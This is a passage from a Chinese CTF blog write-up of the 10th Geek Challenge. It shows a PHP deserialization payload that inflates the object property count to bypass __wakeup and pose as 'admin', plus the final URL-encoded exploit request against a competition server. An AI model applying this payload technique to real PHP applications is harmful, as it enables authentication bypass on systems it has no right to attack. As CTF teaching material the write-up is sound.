<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Name</span></span>&#123;    </span><br><span class="line">    <span class="keyword">private</span> $username = <span class="string">'admin'</span>;    </span><br><span class="line">    <span class="keyword">private</span> $password = <span class="string">'100'</span>;</span><br><span class="line">&#125;</span><br><span class="line">$s=<span class="keyword">new</span> Name();</span><br><span class="line">var_dump(serialize($s));</span><br><span class="line">$payload=<span class="string">"O:4:\"Name\":3&#123;s:14:\"\000Name\000username\";s:5:\"admin\";s:14:\"\000Name\000password\";s:3:\"100\";&#125;"</span>; <span class="comment">//2-&gt;3</span></span><br><span class="line">var_dump(urlencode($payload));<span class="comment">//O%3A4%3A%22Name%22%3A3%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bs%3A3%3A%22100%22%3B%7D</span></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>最终payload</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://118.25.14.40:8109/?select=O%3A4%3A%22Name%22%3A3%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bs%3A3%3A%22100%22%3B%7D</span><br></pre></td></tr></table></figure>

<p><img src="%E7%AC%AC%E5%8D%81%E5%B1%8A%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98Write-up/image-20191106234145206.png" alt="image-20191106234145206"></p>
<p><a href="https://xz.aliyun.com/t/3674#toc-11">参考文章1</a></p>
<p><a href="https://xz.aliyun.com/t/6454#toc-18">参考文章2</a></p>
</script></p>
    </div>

    
    
    
      
  <div class="popular-posts-header">相关文章</div>
  <ul class="popular-posts">
    <li class="popular-posts-item">
      
      
      <div class="popular-posts-title"><a href="\2019\11\01\php弱类型\" rel="bookmark">php弱类型</a></div>
      
    </li>
  
    <li class="popular-posts-item">
      
      
      <div class="popular-posts-title"><a href="\2019\10\30\bypass-disable-functions\" rel="bookmark">bypass_disable_functions</a></div>
      
    </li>
  
  </ul>

        
      
        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>AssCreed</li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/" title="第十届极客大挑战Write-up">https://asscreed.github.io/2019/10/18/第十届极客大挑战Write-up/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fa fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！</li>
</ul>
</div>

      
		<div>
		
			
				<div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">-------------本文结束<i class="fa fa-paw"></i>感谢您的阅读-------------</div>
    
</div>
			
			
      <footer class="post-footer">
          
            
          
          <div class="post-tags">
            
              <a href="/tags/PHP/" rel="tag"> <i class="fa fa-tag"></i> PHP</a>
			   
            
              <a href="/tags/WP/" rel="tag"> <i class="fa fa-tag"></i> WP</a>
			   
            
          </div>
        

        

          <div class="post-nav">
            <div class="post-nav-next post-nav-item">
              
            </div>

            <span class="post-nav-divider"></span>

            <div class="post-nav-prev post-nav-item">
              
                <a href="/2019/10/30/bypass-disable-functions/" rel="prev" title="bypass_disable_functions">
                  bypass_disable_functions <i class="fa fa-chevron-right"></i>
                </a>
              
            </div>
          </div>
        
      </footer>
    
  </div>
  
  
  
  </article>

  </div>


          </div>
          
    
    <div class="comments" id="comments"></div>
  

        </div>
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">
        
        
        
        
      
	
      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
	
	  </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#WEB"><span class="nav-number">1.</span> <span class="nav-text">WEB</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#打比赛前先撸一只猫！-猫猫陪我打ctf！"><span class="nav-number">1.1.</span> <span class="nav-text">打比赛前先撸一只猫！: 猫猫陪我打ctf！</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#你看见过我的菜刀么"><span class="nav-number">1.2.</span> <span class="nav-text">你看见过我的菜刀么</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#BurpSuiiiiiit-拿起你的burp，开始战斗吧"><span class="nav-number">1.3.</span> <span class="nav-text">BurpSuiiiiiit!!!: 拿起你的burp，开始战斗吧</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#性感潇文清，在线算卦：动作快点才能算到好卦。"><span class="nav-number">1.4.</span> <span class="nav-text">性感潇文清，在线算卦：动作快点才能算到好卦。</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Easysql-最近我做了一个小网站，我把flag放在里面了，不过我没有把登陆密码告诉任何人，所以你们是拿不到flag的！"><span class="nav-number">1.5.</span> <span class="nav-text">Easysql: 最近我做了一个小网站，我把flag放在里面了，不过我没有把登陆密码告诉任何人，所以你们是拿不到flag的！</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#RCE-me-I-don’t-think-U-can-system-RCE-prove-to-me"><span class="nav-number">1.6.</span> <span class="nav-text">RCE me: I don’t think U can system RCE, prove to me</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#李三的代码审计笔记第一页：Talk-is-easy-show-me-the-code"><span class="nav-number">1.7.</span> <span class="nav-text">李三的代码审计笔记第一页：Talk is easy ,show me the code.</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#服务端检测系统：emm，自己看"><span class="nav-number">1.8.</span> <span class="nav-text">服务端检测系统：emm，自己看</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Lovelysql：上次是我粗心大意，看来不能直接放在网页上了！"><span class="nav-number">1.9.</span> <span class="nav-text">Lovelysql：上次是我粗心大意，看来不能直接放在网页上了！</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#性感黄阿姨，在线聊天-听说她有很多小秘密和表情包哦，当然也有你们最想要的flag！"><span class="nav-number">1.10.</span> <span class="nav-text">性感黄阿姨，在线聊天:听说她有很多小秘密和表情包哦，当然也有你们最想要的flag！</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#神秘的三叶草"><span class="nav-number">1.11.</span> <span class="nav-text">神秘的三叶草</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Jiang‘s-Secret-我在那放了一个秘密！"><span class="nav-number">1.12.</span> <span class="nav-text">Jiang‘s Secret:我在那放了一个秘密！</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#你有特洛伊么：dGhpcyBpcyBub3QgZWFzeQ"><span class="nav-number">1.13.</span> <span class="nav-text">你有特洛伊么：dGhpcyBpcyBub3QgZWFzeQ==</span></a></li></ol></li></ol></div>
        
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image"
      src="/images/1.gif"
      alt="AssCreed">
  <p class="site-author-name" itemprop="name">AssCreed</p>
  <div class="site-description" itemprop="description">是时代造就英雄还是英雄造就时代？</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        
          <a href="/archives/">
        
          <span class="site-state-item-count">7</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
    
      
      
      <div class="site-state-item site-state-categories">
        
          
            <a href="/categories/">
          
        
        <span class="site-state-item-count">1</span>
        <span class="site-state-item-name">分类</span>
        </a>
      </div>
    
      
      
      <div class="site-state-item site-state-tags">
        
          
            <a href="/tags/">
          
        
        <span class="site-state-item-count">13</span>
        <span class="site-state-item-name">标签</span>
        </a>
      </div>
    
  </nav>
</div>
  <div class="feed-link motion-element">
    <a href="/atom.xml" rel="alternate">
      <i class="fa fa-rss"></i>RSS
    </a>
  </div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
      
      
        
      
      
        
      
        <a href="https://github.com/AssCreed" title="GitHub &rarr; https://github.com/AssCreed" rel="noopener" target="_blank"><i class="fa fa-fw fa-github"></i>GitHub</a>
      </span>
    
  </div>


  <div class="links-of-blogroll motion-element">
    <div class="links-of-blogroll-title">
      <i class="fa fa-fw fa-link"></i>
      推荐阅读
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="https://www.cnblogs.com/mwq1024/" title="https://www.cnblogs.com/mwq1024/" rel="noopener" target="_blank">旧博客</a>
        </li>
      
        <li class="links-of-blogroll-item">
          <a href="https://www.leavesongs.com/" title="https://www.leavesongs.com/" rel="noopener" target="_blank">PH牛</a>
        </li>
      
        <li class="links-of-blogroll-item">
          <a href="https://li1m.github.io/" title="https://li1m.github.io/" rel="noopener" target="_blank">LiM</a>
        </li>
      
    </ul>
  </div>

      </div>
	  
	  
	

    </div>
  </aside>

  <div id="sidebar-dimmer"></div>


      </div>
    </main>
	<link rel="stylesheet" href="/dist/APlayer.min.css">
<div id="aplayer"></div>
<script type="text/javascript" src="/dist/APlayer.min.js"></script>
<script type="text/javascript" src="/dist/music.js"></script>
    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love" id="animate">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">AssCreed</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
      <span class="post-meta-item-text">站点总字数：</span>
    
    <span title="站点总字数">22k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
      <span class="post-meta-item-text">站点阅读时长 &asymp;</span>
    
    <span title="站点阅读时长">20 分钟</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> 强力驱动 v3.9.0</div>
  <span class="post-meta-divider">|</span>
  <div class="theme-info">主题 – <a href="https://theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a> v7.4.0</div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
  
    <span class="post-meta-divider">|</span>
  
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
  
</div>












        
      </div>
    </footer>
  </div>

  
    
  
  <script color='0,0,255' opacity='0.5' zIndex='-1' count='120' src="/lib/canvas-nest/canvas-nest.min.js"></script>
  <script src="/lib/anime.min.js?v=3.1.0"></script>
  <script src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  <script src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
<script src="/js/utils.js?v=7.4.0"></script><script src="/js/motion.js?v=7.4.0"></script>
<script src="/js/schemes/pisces.js?v=7.4.0"></script>
<script src="/js/next-boot.js?v=7.4.0"></script>



  
  <script>
    (function(){
      var bp = document.createElement('script');
      var curProtocol = window.location.protocol.split(':')[0];
      bp.src = (curProtocol === 'https') ? 'https://zz.bdstatic.com/linksubmit/push.js' : 'http://push.zhanzhang.baidu.com/push.js';
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(bp, s);
    })();
  </script>








  <script src="/js/local-search.js?v=7.4.0"></script>














  

  

  


<script>
NexT.utils.getScript('//unpkg.com/valine/dist/Valine.min.js', () => {
  var GUEST = ['nick', 'mail', 'link'];
  var guest = 'nick,mail,link';
  guest = guest.split(',').filter(item => {
    return GUEST.includes(item);
  });
  new Valine({
    el: '#comments',
    verify: false,
    notify: false,
    appId: '0eYM2A8pUSnA2EEyrujClGRN-MdYXbMMI',
    appKey: 'BJmUYA3jJHocnfnm4LpPR9Ow',
    placeholder: 'Just go go',
    avatar: 'mm',
    meta: guest,
    pageSize: '10' || 10,
    visitor: false,
    lang: '' || 'zh-cn',
    path: location.pathname
  });
}, window.Valine);
</script>

<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>
